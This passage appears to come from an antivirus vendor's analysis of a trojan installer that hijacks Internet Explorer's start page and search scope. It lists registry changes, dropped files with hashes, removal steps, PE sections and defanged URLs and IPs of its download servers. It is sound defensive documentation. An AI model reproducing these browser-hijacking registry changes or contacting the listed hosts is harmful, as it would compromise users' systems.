"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"51652492" = "///%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD/SxAm/Ch/VP/v/YD/OP////%%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"ef34a9f6" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"fd0dde78" = "dlAB/DZ/Ml/h/DP/QP/ /Ct/UPAB/DV/M/AC/Bh/M//e/Cb/Vx/i/Ct/PPAC/CP/UP/1/CV/Vl/e/CJ/Qx/1/CD/PlAX/DF/QPA7////"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"
Dropped PE files
MD5 | File path |
---|---|
5b4046db8f3c698418f9b2b51d8c292f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe |
2d3705d26f35d66e26b7300384bc01dc | c:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.dll |
2e1bb4d22880abbf5df8f4343e16c356 | c:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.exe |
c9456944ec1989ab0e2bf9e23df1c952 | c:\Program Files\CutaThePrice\CutaThePrice.exe |
f3cf89605ef83f1f6e4ffbfb8b6cef70 | c:\Program Files\TerminusKeeper\TerminusKeeper.dll |
635d528b505f4ffa3a6b4aea855c5001 | c:\Program Files\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe |
6e7027aac3d75239fa9684eb5a8863c4 | c:\Program Files\bestadblocker\tEp7pMPAVoxXWr.dll |
34b46fb135e5264c60ddcf36b0c718bd | c:\Program Files\bestadblocker\tEp7pMPAVoxXWr.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1304
%original file name%.exe:996
%original file name%.exe:592
%original file name%.exe:1936
%original file name%.exe:440
NybbleCrawler.xyz.exe:356
rundll32.exe:1256
regsvr32.exe:2008
regsvr32.exe:1784
hpds_setup.exe:164 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\8[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\progressbar.gif (15 bytes)
%WinDir%\Tasks\Bidaily Synchronize Task[973b].job (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_5.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_1_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_3_1[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_3[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_1_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3_1.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini.txt (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_1_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_2.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_1[1].txt (392 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\bg.ca.part (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(2).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini.txt (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1_4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\5.ini.tmp (14 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\52eea08e054915129f2638d8012a38f6.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6.ini.tmp (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_3.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\8.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\5[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe (27635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_2_1[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\loader.gif (2 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll (6693 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\820cb716dd7864a479458114e3582eab.ini (514 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb (13 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (42 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dB1XJloRgbF4Qw[1].ca (133377 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca.part (119356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g7CyPVZagCsRV8[1].ca (134158 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb (13 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe (3572 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca.part (153797 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (44 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\e605d3cdf72e06d079458114e3582eab.ini (512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\9b4263a9124509d379458114e3582eab.ini (297 bytes)
%Program Files%\CutaThePrice\CutaThePrice.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca.part (24208 bytes)
%Program Files%\CutaThePrice\CutaThePrice.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\hVwDePRrG2aSqC[1].ca (35544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\fyBYRfMAYKA66R[1].ca (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca.part (6 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\bab831a24b139eab79458114e3582eab.ini (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\loader.gif (2 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca.part (29136 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\progressbar.gif (15 bytes)
%Program Files%\TerminusKeeper\TerminusKeeper.dll (189078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (20506 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 47280 | 47616 | 4.40241 | 37d612d6a9acb8f84028f2746ecfb55f |
.rdata | 53248 | 141036 | 141312 | 5.41827 | 592d08be8b4356e664ca45751ece4f2c |
.data | 196608 | 28948 | 21504 | 0.904746 | 8c041560eefe8cbc360ca9f34a66f7b9 |
.rsrc | 229376 | 17904 | 17920 | 4.42194 | 70bd0d0b9733e9bf46a2af29c22a6241 |
.reloc | 249856 | 4766 | 5120 | 3.19352 | cac48ca405a5247f77ff5eb0ad24c76c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://r1.the-invention.org/ | 54.148.216.39 |
hxxp://r1.the-invention.org/?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://r1.the-invention.org/?step_id=4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://r1.the-invention.org/?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://r1.the-invention.org/?step_id=4_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://r1.the-invention.org/?step_id=4_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://r1.the-invention.org/?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://r1.the-invention.org/?step_id=6&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://r1.the-invention.org/?step_id=6_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://multipledirect.ru/?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&dd=4&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 | 54.149.75.132 |
